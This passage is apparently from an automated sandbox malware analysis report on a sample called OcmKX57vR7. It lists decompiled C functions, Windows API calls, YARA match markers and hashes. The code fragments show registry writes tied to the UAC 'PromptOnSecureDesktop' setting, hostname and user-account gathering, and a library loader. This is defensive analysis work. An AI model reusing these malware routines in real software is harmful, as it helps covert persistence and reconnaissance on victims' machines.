                                                                                                                                    • Part of subcall function 0040675C: CreateFileA.KERNELBASE(?,80000000,00000003,00000000,00000003,00000080,00000000,?,761B43E0,00000000), ref: 0040679A
                                                                                                                                    • Part of subcall function 0040675C: CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000004,00000000,?,761B43E0,00000000), ref: 004067B0
                                                                                                                                    • Part of subcall function 0040675C: SetFileAttributesA.KERNEL32(?,00000002,?,761B43E0,00000000), ref: 004067BF
                                                                                                                                    • Part of subcall function 0040675C: GetFileSize.KERNEL32(000000FF,00000000,?,761B43E0,00000000), ref: 004067D3
                                                                                                                                    • Part of subcall function 0040675C: ReadFile.KERNELBASE(000000FF,?,00000040,00408244,00000000,?,761B43E0,00000000), ref: 00406807
                                                                                                                                    • Part of subcall function 0040675C: SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,761B43E0,00000000), ref: 0040681F
                                                                                                                                    • Part of subcall function 0040675C: ReadFile.KERNELBASE(000000FF,?,000000F8,?,00000000,?,761B43E0,00000000), ref: 0040683E
                                                                                                                                    • Part of subcall function 0040675C: SetFilePointer.KERNELBASE(000000FF,?,00000000,00000000,?,761B43E0,00000000), ref: 0040685C
                                                                                                                                    • Part of subcall function 0040EC2E: GetProcessHeap.KERNEL32(00000000,'@,00000000,0040EA27,00000000), ref: 0040EC41
                                                                                                                                    • Part of subcall function 0040EC2E: HeapFree.KERNEL32(00000000), ref: 0040EC48
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: File$AttributesCreateHeapPointerQueryReadValue$CloseFreeOpenProcessSize
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 124786226-2980165447
                                                                                                                                  • Opcode ID: f8d88a9031908b503ac4450561c2f1a3dcf4dc87a59708a9d294670bec484122
                                                                                                                                  • Instruction ID: c6ff5cc28a73505882571aaa3479db7aabb841166acb9389a4089cab67cb233b
                                                                                                                                  • Opcode Fuzzy Hash: f8d88a9031908b503ac4450561c2f1a3dcf4dc87a59708a9d294670bec484122
                                                                                                                                  • Instruction Fuzzy Hash: 6641A2B1801109BFEB10EBA19E81DEF777CDB04304F1448BFF545F2182EAB85A948B59
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0042D474 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 106COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                  • String ID: 0$9
                                                                                                                                  • API String ID: 3120068967-1975997740
                                                                                                                                  • Opcode ID: 691507e34d7afe4ea86414c9a6e42aae493159cc18c1754af5f3c9dc0af58606
                                                                                                                                  • Instruction ID: 088c3d47d8d0274aa8753d7ba779fbf6fe5e7d9133052a4499599c1af462acad
                                                                                                                                  • Opcode Fuzzy Hash: 691507e34d7afe4ea86414c9a6e42aae493159cc18c1754af5f3c9dc0af58606
                                                                                                                                  • Instruction Fuzzy Hash: D341F4B1E05229DFEB24CF58D889BAEB7B5BB84304F6481DAD049A7240C7789E85CF45
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0042E7F9 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 105COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __aulldiv__aullrem_get_int64_arg
                                                                                                                                  • String ID: '$9
                                                                                                                                  • API String ID: 3120068967-1823400153
                                                                                                                                  • Opcode ID: 77454f3ef24fc6127ea5a9b42341be1eb876f1449da21b787ef907bebcdd289a
                                                                                                                                  • Instruction ID: 1c52575e259da486ba6c398081418c2db578d6301d08719f2cdf30cb48880645
                                                                                                                                  • Opcode Fuzzy Hash: 77454f3ef24fc6127ea5a9b42341be1eb876f1449da21b787ef907bebcdd289a
                                                                                                                                  • Instruction Fuzzy Hash: 1D4116F1E001299FDB64CF49D841BAEB7B5FF85314F40459AD188AB241C7785E81CF5A
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040E095 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0040E095(void* _a4, char* _a8, intOrPtr* _a12, char* _a16, int _a20) {
				int _v8;
				char* _v12;
				void* _v16;
				char _v48;
				intOrPtr* _t34;
				int _t50;
				void* _t52;
				intOrPtr _t53;
				int _t57;
				int _t58;
				void* _t59;
				void* _t60;
				void* _t61;

				_t57 = 0;
				if(RegCreateKeyExA(_a4, _a8, 0, 0, 0, 0x20106, 0,  &_v16, 0) != 0) {
					return 0;
				}
				_v12 = _a16;
				_t34 = _a12;
				_t52 = _t34 + 1;
				do {
					_t53 =  *_t34;
					_t34 = _t34 + 1;
				} while (_t53 != 0);
				_t55 = _t34 - _t52;
				_v8 = 0;
				if(_t34 - _t52 > 0x1c) {
					_t55 = 0x1c;
				}
				E0040EE08( &_v48, _a12, _t55);
				_t50 = _a20;
				_t61 = _t60 + 0xc;
				if(_t50 <= _t57) {
					L11:
					E0040F1ED(_v8, _t59 + _t55 - 0x2c, 0xa);
					RegDeleteValueA(_v16,  &_v48);
					RegCloseKey(_v16);
					return 0 | _t50 == _t57;
				} else {
					while(1) {
						_t58 = 0xff000;
						if(_t50 < 0xff000) {
							_t58 = _t50;
						}
						E0040F1ED(_v8, _t59 + _t55 - 0x2c, 0xa);
						_t61 = _t61 + 0xc;
						if(RegSetValueExA(_v16,  &_v48, 0, 3, _v12, _t58) != 0) {
							break;
						}
						_v12 =  &(_v12[_t58]);
						_t50 = _t50 - _t58;
						_v8 = _v8 + 1;
						if(_t50 > 0) {
							continue;
						}
						break;
					}
					_t57 = 0;
					goto L11;
				}
			}
















                                                                                                                                  0x0040e09c
                                                                                                                                  0x0040e0ba
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e172
                                                                                                                                  0x0040e0c3
                                                                                                                                  0x0040e0c6
                                                                                                                                  0x0040e0c9
                                                                                                                                  0x0040e0cc
                                                                                                                                  0x0040e0cc
                                                                                                                                  0x0040e0ce
                                                                                                                                  0x0040e0cf
                                                                                                                                  0x0040e0d7
                                                                                                                                  0x0040e0d9
                                                                                                                                  0x0040e0df
                                                                                                                                  0x0040e0e3
                                                                                                                                  0x0040e0e3
                                                                                                                                  0x0040e0ec
                                                                                                                                  0x0040e0f1
                                                                                                                                  0x0040e0f4
                                                                                                                                  0x0040e0f9
                                                                                                                                  0x0040e13f
                                                                                                                                  0x0040e149
                                                                                                                                  0x0040e158
                                                                                                                                  0x0040e161
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e0fb
                                                                                                                                  0x0040e0fb
                                                                                                                                  0x0040e0fb
                                                                                                                                  0x0040e102
                                                                                                                                  0x0040e104
                                                                                                                                  0x0040e104
                                                                                                                                  0x0040e110
                                                                                                                                  0x0040e115
                                                                                                                                  0x0040e12f
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e131
                                                                                                                                  0x0040e134
                                                                                                                                  0x0040e136
                                                                                                                                  0x0040e13b
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e13b
                                                                                                                                  0x0040e13d
                                                                                                                                  0x00000000
                                                                                                                                  0x0040e13d

                                                                                                                                  APIs
                                                                                                                                  • RegCreateKeyExA.ADVAPI32(80000001,0040E2A3,00000000,00000000,00000000,00020106,00000000,0040E2A3,00000000,000000E4), ref: 0040E0B2
                                                                                                                                  • RegSetValueExA.ADVAPI32(0040E2A3,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0040E127
                                                                                                                                  • RegDeleteValueA.ADVAPI32(0040E2A3,?,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 0040E158
                                                                                                                                  • RegCloseKey.ADVAPI32(0040E2A3,?,?,?,?,000000C8,PromptOnSecureDesktop,?,?,?,?,?,?,?,?,0040E2A3), ref: 0040E161
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Value$CloseCreateDelete
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 2667537340-2980165447
                                                                                                                                  • Opcode ID: 638dec105df7dcb1f365d34fe073c8f8fa39a9ad738abc938cf50ffa02a2619f
                                                                                                                                  • Instruction ID: af4a942e7328ea1ce2cdf979f73f75556816175b5134196b99f0fb832a21e1c2
                                                                                                                                  • Opcode Fuzzy Hash: 638dec105df7dcb1f365d34fe073c8f8fa39a9ad738abc938cf50ffa02a2619f
                                                                                                                                  • Instruction Fuzzy Hash: 2F218071A00219BBDF209FA6EC89EDF7F79EF08754F008072F904A6190E6718A64DB94
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00ADE2FC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92registryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RegCreateKeyExA.ADVAPI32(80000001,00ADE50A,00000000,00000000,00000000,00020106,00000000,00ADE50A,00000000,000000E4), ref: 00ADE319
                                                                                                                                  • RegSetValueExA.ADVAPI32(00ADE50A,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 00ADE38E
                                                                                                                                  • RegDeleteValueA.ADVAPI32(00ADE50A,?,?,?,?,?,000000C8,PromptOnSecureDesktop), ref: 00ADE3BF
                                                                                                                                  • RegCloseKey.ADVAPI32(00ADE50A,?,?,?,?,000000C8,PromptOnSecureDesktop,?,?,?,?,?,?,?,?,00ADE50A), ref: 00ADE3C8
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Value$CloseCreateDelete
                                                                                                                                  • String ID: PromptOnSecureDesktop
                                                                                                                                  • API String ID: 2667537340-2980165447
                                                                                                                                  • Opcode ID: 71be46fcf4b4c1b855c56a8beb8c548cd5d416d4e28516e03566d8543fb954ad
                                                                                                                                  • Instruction ID: c57011f554f42c4504bdd26d87baf466d730c7b0aa5616c916e57e93d0f59832
                                                                                                                                  • Opcode Fuzzy Hash: 71be46fcf4b4c1b855c56a8beb8c548cd5d416d4e28516e03566d8543fb954ad
                                                                                                                                  • Instruction Fuzzy Hash: E6214F71A0021DABDF20AFA4EC85EEF7F79EF08750F008022F906EA251E2718A54D790
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD71C6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 89COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetUserNameA.ADVAPI32(?,?), ref: 00AD71E1
                                                                                                                                  • LookupAccountNameA.ADVAPI32(00000000,?,?,?,?,?,?), ref: 00AD7228
                                                                                                                                  • LocalFree.KERNEL32(?,?,?), ref: 00AD7286
                                                                                                                                  • wsprintfA.USER32 ref: 00AD729D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Name$AccountFreeLocalLookupUserwsprintf
                                                                                                                                  • String ID: |
                                                                                                                                  • API String ID: 2539190677-2343686810
                                                                                                                                  • Opcode ID: 0c0665c49b02975d3cb655efb4674a53369201e8279effc4896e63a6fe97e42a
                                                                                                                                  • Instruction ID: 76bfb908aec0685af7d998ee72afa197105f7d011f7a41e578624e33579b6ebd
                                                                                                                                  • Opcode Fuzzy Hash: 0c0665c49b02975d3cb655efb4674a53369201e8279effc4896e63a6fe97e42a
                                                                                                                                  • Instruction Fuzzy Hash: FC311A72904208BFDB01DFA8DD45ADE7BACEF04314F148166F95ADB201EA75DA488B94
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040AD08 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55stringnetworkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0040AD08(CHAR* _a4) {
				char _v132;
				int _t9;
				char _t11;
				intOrPtr* _t12;
				CHAR* _t13;
				CHAR* _t14;

				_t9 = gethostname( &_v132, 0x80);
				if(_t9 != 0) {
					_t14 = _a4;
					L15:
					if( *_t14 != 0) {
						return _t9;
					}
					return lstrcpyA(_t14, "LocalHost");
				}
				_t13 = _a4;
				_t11 = _v132;
				_t12 =  &_v132;
				_t14 = _t13;
				while(_t11 != 0) {
					if(_t11 < 0x61 || _t11 > 0x7a) {
						if(_t11 < 0x41 || _t11 > 0x5a) {
							if(_t11 < 0x30 || _t11 > 0x39) {
								if(_t11 != 0x2e) {
									goto L10;
								}
							}
						}
						goto L9;
					} else {
						L9:
						 *_t13 = _t11;
						_t13 =  &(_t13[1]);
						L10:
						_t12 = _t12 + 1;
						_t11 =  *_t12;
						continue;
					}
				}
				_t9 = lstrlenA(_t14);
				if(_t14[_t9] == 0x2e) {
					_t9 = lstrlenA(_t14);
					_t14[_t9] = 0;
				}
				goto L15;
			}









                                                                                                                                  0x0040ad1c
                                                                                                                                  0x0040ad24
                                                                                                                                  0x0040ad71
                                                                                                                                  0x0040ad74
                                                                                                                                  0x0040ad77
                                                                                                                                  0x0040ad88
                                                                                                                                  0x0040ad88
                                                                                                                                  0x00000000
                                                                                                                                  0x0040ad7f
                                                                                                                                  0x0040ad26
                                                                                                                                  0x0040ad29
                                                                                                                                  0x0040ad2c
                                                                                                                                  0x0040ad2f
                                                                                                                                  0x0040ad55
                                                                                                                                  0x0040ad35
                                                                                                                                  0x0040ad3d
                                                                                                                                  0x0040ad45
                                                                                                                                  0x0040ad4d
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0040ad4d
                                                                                                                                  0x0040ad45
                                                                                                                                  0x00000000
                                                                                                                                  0x0040ad4f
                                                                                                                                  0x0040ad4f
                                                                                                                                  0x0040ad4f
                                                                                                                                  0x0040ad51
                                                                                                                                  0x0040ad52
                                                                                                                                  0x0040ad52
                                                                                                                                  0x0040ad53
                                                                                                                                  0x00000000
                                                                                                                                  0x0040ad53
                                                                                                                                  0x0040ad35
                                                                                                                                  0x0040ad60
                                                                                                                                  0x0040ad66
                                                                                                                                  0x0040ad69
                                                                                                                                  0x0040ad6b
                                                                                                                                  0x0040ad6b
                                                                                                                                  0x00000000

                                                                                                                                  APIs
                                                                                                                                  • gethostname.WS2_32(?,00000080), ref: 0040AD1C
                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040AD60
                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040AD69
                                                                                                                                  • lstrcpyA.KERNEL32(00000000,LocalHost), ref: 0040AD7F
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrlen$gethostnamelstrcpy
                                                                                                                                  • String ID: LocalHost
                                                                                                                                  • API String ID: 3695455745-3154191806
                                                                                                                                  • Opcode ID: 8a17093f3d26383e77935b758fdadb31e519a4398e40a43d70c627834661f375
                                                                                                                                  • Instruction ID: 5e983dddb47fd7e780230f110e9d304ee880480ae48faa8370a3fb9af9ed59c3
                                                                                                                                  • Opcode Fuzzy Hash: 8a17093f3d26383e77935b758fdadb31e519a4398e40a43d70c627834661f375
                                                                                                                                  • Instruction Fuzzy Hash: FA0149208443895EDF3107289844BEA3F675F9670AF104077E4C0BB692E77C8893835F
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00ADB478 Relevance: 7.6, APIs: 5, Instructions: 131timeCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetLocalTime.KERNEL32(?), ref: 00ADB51A
                                                                                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00ADB529
                                                                                                                                  • SystemTimeToFileTime.KERNEL32(?,?), ref: 00ADB548
                                                                                                                                  • GetTimeZoneInformation.KERNEL32(?), ref: 00ADB590
                                                                                                                                  • wsprintfA.USER32 ref: 00ADB61E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Time$File$Local$InformationSystemZonewsprintf
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4026320513-0
                                                                                                                                  • Opcode ID: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                                                                  • Instruction ID: 1855999ddded257e6d5b8e73e04ca7eb728408bb2abd33832ca59549e2f801fd
                                                                                                                                  • Opcode Fuzzy Hash: fbb2cc535003bdd2a03704f06e43c86ec17b275768f9954b8d174276db173d5b
                                                                                                                                  • Instruction Fuzzy Hash: B5510071D0021CEACF14DFD5D8495EEBBB9BF48304F11816BE506A6250E7B84AC9CFA8
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00AD62D0 Relevance: 7.6, APIs: 5, Instructions: 121libraryloaderCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • IsBadHugeReadPtr.KERNEL32(?,00000014), ref: 00AD6303
                                                                                                                                  • LoadLibraryA.KERNEL32(?), ref: 00AD632A
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00AD63B1
                                                                                                                                  • IsBadHugeReadPtr.KERNEL32(-000000DC,00000014), ref: 00AD6405
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.280127790.0000000000AD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00AD0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_ad0000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HugeRead$AddressLibraryLoadProc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3498078134-0
                                                                                                                                  • Opcode ID: 22151fd6ac6a99dd14e45186f4812a7dac7af9c00bb3bb0eb99ee7530713bb62
                                                                                                                                  • Instruction ID: a83fa53bbcd5e05171866a1d26571dd0bcd7e04f98affada62f738d67636ffc8
                                                                                                                                  • Opcode Fuzzy Hash: 22151fd6ac6a99dd14e45186f4812a7dac7af9c00bb3bb0eb99ee7530713bb62
                                                                                                                                  • Instruction Fuzzy Hash: 09414AB1A00209EFDB14CF58C984BA9B7B8FF14354F28816AE816DB390E775ED41CB50
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 004156DA Relevance: 7.6, APIs: 5, Instructions: 120COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279779724.0000000000415000.00000020.00000001.01000000.00000003.sdmp, Offset: 00415000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_415000_OcmKX57vR7.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __un_inc$__inc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 715532115-0
                                                                                                                                  • Opcode ID: e649c02e62a12101f2747fd93684baa404b5747cfbd2d49534dae470f0e9af3a
                                                                                                                                  • Instruction ID: f942b1f4a04b6f0f9e0d70a22d6cc7c0db211ee0f9e66cba493c5219ac1b7685
                                                                                                                                  • Opcode Fuzzy Hash: e649c02e62a12101f2747fd93684baa404b5747cfbd2d49534dae470f0e9af3a
                                                                                                                                  • Instruction Fuzzy Hash: 55418FB4E00518DFCF14DF69D8955EDB771AF84314F20C29BE82A9B381D639AA80CF58
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 00402923 Relevance: 7.6, APIs: 5, Instructions: 107COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 62%
                                                                                                                                  			E00402923(void* __ecx, void* __esi, intOrPtr _a4) {
				signed int* _v8;
				signed int* _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed short _v28;
				short _v30;
				short _v32;
				char _v292;
				char _v296;
				void* __ebx;
				void* __edi;
				void* _t37;
				intOrPtr _t41;
				signed int* _t42;
				signed short _t53;
				signed int** _t62;
				void* _t67;
				void* _t70;
				intOrPtr _t71;
				intOrPtr* _t79;
				signed int* _t80;
				void* _t81;
				void* _t82;
				void* _t83;

				_t81 = __esi;
				_t37 = 0xc;
				_v8 = 0;
				_v16 = 0;
				if(_a4 >= _t37) {
					_t67 = E00402816(_t37, __esi, __ecx, __esi, _a4);
					if(_t67 < _a4) {
						_t76 =  *(__esi + 6) & 0x0000ffff;
						_t41 = ( *(__esi + 0xa) & 0x0000ffff) + ( *(__esi + 8) & 0x0000ffff) + ( *(__esi + 6) & 0x0000ffff);
						_v20 = _t41;
						_v12 = 0;
						if(_t41 <= 0) {
							L13:
							_t42 = _v16;
							L14:
							return _t42;
						}
						while(_t67 < _a4) {
							E0040EE2A(_t76,  &_v296, 0, 0x114);
							_t70 = E00402871(_t67, _t81, _t76,  &_v292, _a4);
							_t15 = _t70 + 0xa; // 0xa
							_t83 = _t82 + 0x10;
							if(_t15 >= _a4) {
								goto L13;
							}
							_t79 = __imp__#15;
							_v32 =  *_t79( *(_t70 + _t81) & 0x0000ffff);
							_v30 =  *_t79( *(_t70 + _t81 + 2) & 0x0000ffff);
							_t53 =  *_t79( *(_t70 + _t81 + 8) & 0x0000ffff);
							_v28 = _t53;
							_t71 = _t70 + 0xa;
							_v24 = _t71;
							if((_t53 & 0x0000ffff) + _t71 > _a4) {
								goto L13;
							}
							_t80 = HeapAlloc(GetProcessHeap(), 0, 0x124);
							if(_t80 == 0) {
								goto L13;
							}
							E0040EE2A(_t76, _t80, 0, 0x124);
							E0040EE08(_t80,  &_v296, 0x114);
							 *_t80 =  *_t80 & 0x00000000;
							_t67 = _t71 + (_v28 & 0x0000ffff);
							_t62 = _v8;
							_t82 = _t83 + 0x18;
							_v8 = _t80;
							if(_t62 != 0) {
								 *_t62 = _t80;
							} else {
								_v16 = _t80;
							}
							_v12 = _v12 + 1;
							if(_v12 < _v20) {
								continue;
							} else {
								goto L13;
							}
						}
						goto L13;
					}
					_t42 = 0;
					goto L14;
				}
				return 0;
			}




























                                                                                                                                  0x00402923
                                                                                                                                  0x00402931
                                                                                                                                  0x00402932
                                                                                                                                  0x00402935
                                                                                                                                  0x0040293b
                                                                                                                                  0x00402950
                                                                                                                                  0x00402957
                                                                                                                                  0x0040296a
                                                                                                                                  0x0040296e
                                                                                                                                  0x00402970
                                                                                                                                  0x00402973
                                                                                                                                  0x00402978
                                                                                                                                  0x00402a5b
                                                                                                                                  0x00402a5b
                                                                                                                                  0x00402a5e
                                                                                                                                  0x00000000
                                                                                                                                  0x00402a5e
                                                                                                                                  0x0040297e
                                                                                                                                  0x00402995
                                                                                                                                  0x004029ac
                                                                                                                                  0x004029ae
                                                                                                                                  0x004029b1
                                                                                                                                  0x004029b7
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x004029c1
                                                                                                                                  0x004029ca
                                                                                                                                  0x004029d6
                                                                                                                                  0x004029e0
                                                                                                                                  0x004029e2
                                                                                                                                  0x004029e6
                                                                                                                                  0x004029ee
                                                                                                                                  0x004029f4
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402a0a
                                                                                                                                  0x00402a0e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402a18
                                                                                                                                  0x00402a2a
                                                                                                                                  0x00402a33
                                                                                                                                  0x00402a36
                                                                                                                                  0x00402a38
                                                                                                                                  0x00402a3b
                                                                                                                                  0x00402a3e
                                                                                                                                  0x00402a43
                                                                                                                                  0x00402a4a
                                                                                                                                  0x00402a45
                                                                                                                                  0x00402a45
                                                                                                                                  0x00402a45
                                                                                                                                  0x00402a4c
                                                                                                                                  0x00402a55
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00402a55
                                                                                                                                  0x00000000
                                                                                                                                  0x0040297e
                                                                                                                                  0x00402959
                                                                                                                                  0x00000000
                                                                                                                                  0x00402959
                                                                                                                                  0x00000000

                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000000.00000002.279757756.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 00000000.00000002.279776907.0000000000414000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_OcmKX57vR7.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 762ec8260f02deadf6d9e217c9def93c366307fd2496715c07d4077f743f5322
                                                                                                                                  • Instruction ID: 0bfd2bf0caf83722c61519a9099cbfb16c0865a6a5fe5c2769a2057d5fd36f2a
                                                                                                                                  • Opcode Fuzzy Hash: 762ec8260f02deadf6d9e217c9def93c366307fd2496715c07d4077f743f5322
                                                                                                                                  • Instruction Fuzzy Hash: 2931A471A00219ABCB109FA6CD85ABEB7F4FF48705F10846BF504F62C1E7B8D6418B68
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Function 0040E654 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 96stringCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E0040E654(intOrPtr _a4, intOrPtr _a8, CHAR* _a12) {
				intOrPtr _t30;
				CHAR* _t31;
				int _t34;
				intOrPtr* _t41;
				intOrPtr* _t42;
				void* _t47;
				intOrPtr _t51;
				int _t52;
				void* _t53;
				intOrPtr _t54;
				void* _t55;
				char _t59;

				E0040DD05();
				_t41 = 0x4120e8;
				_t55 =  *0x4120e8 - 0x4120e8; // 0x4120e8
				if(_t55 == 0) {
					L9:
					_t53 = E0040EBCC(0x1c);
					if(_t53 != 0) {
						 *((intOrPtr*)(_t53 + 0x18)) = _a4;
						 *((intOrPtr*)(_t53 + 4)) = _a8;
						E00403E8F(0x4120e8, _t53);
						__eflags = _a12;
						if(_a12 == 0) {
							 *(_t53 + 8) = 0;
						} else {
							_t15 = _t53 + 8; // 0x8
